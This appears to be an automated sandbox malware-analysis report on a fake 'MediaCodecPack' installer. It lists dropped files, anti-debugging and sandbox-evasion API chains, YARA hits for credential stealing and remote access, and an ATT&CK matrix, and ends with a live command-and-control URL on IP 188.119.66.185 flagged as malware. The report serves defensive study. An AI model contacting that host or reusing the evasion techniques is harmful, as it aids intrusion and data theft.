Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\msvcp71.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\msvcr71.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SM9H7.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-0BJ08.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-CJLSG.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SM9H7.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\uninstall\is-67S07.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SM9H7.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\uninstall\unins000.exe (copy)
Source: C:\Users\user\Desktop\steel.exe.3.exe | Evasive API call chain: GetSystemTime,DecisionNodes graph_0-5967
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_2-61773
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | API coverage: 4.8 %
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe TID: 4284 | Thread sleep count: 4819 > 30
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe TID: 4284 | Thread sleep time: -9638000s >= -30000s
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe TID: 5320 | Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe TID: 4284 | Thread sleep count: 5105 > 30
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe TID: 4284 | Thread sleep time: -10210000s >= -30000s
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00452A60 FindFirstFileA,GetLastError, 1_2_00452A60
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00474F88 FindFirstFileA,FindNextFileA,FindClose, 1_2_00474F88
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, 1_2_004980A4
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_00464158
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00462750 FindFirstFileA,FindNextFileA,FindClose, 1_2_00462750
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_00463CDC
Source: C:\Users\user\Desktop\steel.exe.3.exe | Code function: 0_2_00409B78 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery, 0_2_00409B78
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | Thread delayed: delay time: 60000
Source: mediacodecpack3.exe, 00000002.00000002.2981066269.00000000007C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWp
Source: mediacodecpack3.exe, 00000002.00000002.2982383221.0000000003350000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack3.exe, 00000002.00000002.2981066269.00000000008BC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\steel.exe.3.exe | API call chain: ExitProcess graph end node graph_0-6764
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | API call chain: ExitProcess graph end node graph_2-61260
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep graph_2-61668
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | Code function: 2_2_0040D6B9 rdtsc 2_2_0040D6B9
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | Code function: 2_2_02BA3A08 IsDebuggerPresent, 2_2_02BA3A08
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | Code function: 2_2_02BAE6BE RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer, 2_2_02BAE6BE
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_004502C0
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | Code function: 2_2_02B95E5E RtlInitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection, 2_2_02B95E5E
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | Code function: 2_2_02BA80E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_02BA80E8
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_00478504 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle, 1_2_00478504
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_0042E09C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid, 1_2_0042E09C
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | Code function: 2_2_02B9E85F cpuid 2_2_02B9E85F
Source: C:\Users\user\Desktop\steel.exe.3.exe | Code function: GetLocaleInfoA, 0_2_0040520C
Source: C:\Users\user\Desktop\steel.exe.3.exe | Code function: GetLocaleInfoA, 0_2_00405258
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: GetLocaleInfoA, 1_2_00408568
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: GetLocaleInfoA, 1_2_004085B4
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_004585C8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle, 1_2_004585C8
Source: C:\Users\user\Desktop\steel.exe.3.exe | Code function: 0_2_004026C4 GetSystemTime, 0_2_004026C4
Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmp | Code function: 1_2_0045559C GetUserNameA, 1_2_0045559C
Source: C:\Users\user\Desktop\steel.exe.3.exe | Code function: 0_2_00405CF4 GetVersionExA, 0_2_00405CF4

Stealing of Sensitive Information

Source: Yara match | File source: 00000002.00000002.2981856828.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: mediacodecpack3.exe PID: 5544, type: MEMORYSTR

Remote Access Functionality

                    Source: Yara matchFile source: 00000002.00000002.2981856828.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: mediacodecpack3.exe PID: 5544, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,2_2_609660FA
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,2_2_6090C1D6
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,2_2_60963143
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,2_2_6096A2BD
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,2_2_6096923E
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,2_2_6096A38C
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,2_2_6096748C
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,2_2_609254B1
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_6094B407
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6090F435 sqlite3_bind_parameter_index,2_2_6090F435
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,2_2_609255D4
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_609255FF sqlite3_bind_text,2_2_609255FF
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6096A5EE sqlite3_value_text,sqlite3_value_bytes,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_malloc,sqlite3_column_int,sqlite3_column_int64,sqlite3_column_text,sqlite3_column_bytes,sqlite3_finalize,sqlite3_step,sqlite3_free,sqlite3_finalize,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_column_int64,sqlite3_column_int,sqlite3_column_text,sqlite3_column_bytes,sqlite3_step,sqlite3_finalize,sqlite3_strnicmp,sqlite3_strnicmp,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_malloc,sqlite3_bind_null,sqlite3_step,sqlite3_reset,sqlite3_value_int,sqlite3_value_text,sqlite3_value_bytes,sqlite3_free,2_2_6096A5EE
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6094B54C sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,memmove,2_2_6094B54C
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_60925686 sqlite3_bind_int64,sqlite3_mutex_leave,2_2_60925686
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6094A6C5 sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_malloc,sqlite3_reset,sqlite3_free,2_2_6094A6C5
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_609256E5 sqlite3_bind_int,sqlite3_bind_int64,2_2_609256E5
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6094B6ED sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,2_2_6094B6ED
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6092562A sqlite3_bind_blob,2_2_6092562A
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_60925655 sqlite3_bind_null,sqlite3_mutex_leave,2_2_60925655
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6094C64A sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,2_2_6094C64A
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,2_2_609687A7
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_6095F7F7
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,2_2_6092570B
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,2_2_6095F772
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,2_2_60925778
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6090577D sqlite3_bind_parameter_name,2_2_6090577D
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,2_2_6094B764
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6090576B sqlite3_bind_parameter_count,2_2_6090576B
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,2_2_6094A894
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,2_2_6095F883
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,2_2_6094C8C2
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,2_2_6096281E
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,2_2_6096583A
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,2_2_6095F9AD
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,2_2_6094A92B
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6090EAE5 sqlite3_transfer_bindings,2_2_6090EAE5
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,2_2_6095FB98
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,2_2_6095ECA6
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,2_2_6095FCCE
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,2_2_6095FDAE
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,2_2_60966DF1
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,2_2_60969D75
Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe; Code function: 2_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,2_2_6095FFB2

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 3 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 5 Windows Service | 1 DLL Side-Loading | 3 Obfuscated Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Input Capture | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 Service Execution | 1 Bootkit | 1 Access Token Manipulation | 21 Software Packing | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 5 Windows Service | 1 DLL Side-Loading | NTDS | 135 System Information Discovery | Distributed Component Object Model | Input Capture | 1 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 2 Process Injection | 1 Masquerading | LSA Secrets | 251 Security Software Discovery | SSH | Keylogging | 12 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 121 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 121 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Process Injection | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Bootkit | /etc/passwd and /etc/shadow | 3 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

No Antivirus matches

Source | Detection | Scanner
C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe | 100% | Joe Sandbox ML
C:\ProgramData\MediaCodecPack\MediaCodecPack.exe | 100% | Joe Sandbox ML
C:\ProgramData\MediaCodecPack\sqlite3.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\gdiplus.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-0BJ08.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-5V918.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-CJLSG.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-SHN24.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-UGFNO.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\msvcp71.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\msvcr71.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\sqlite3.dll (copy) | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-SM9H7.tmp\_isetup\_iscrypt.dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-SM9H7.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\is-SM9H7.tmp\_isetup\_shfoldr.dll | 0% | ReversingLabs

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
https://188.119.66.185/ography | 0% | Avira URL Cloud | safe
https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261cda3088 | 100% | Avira URL Cloud | malware
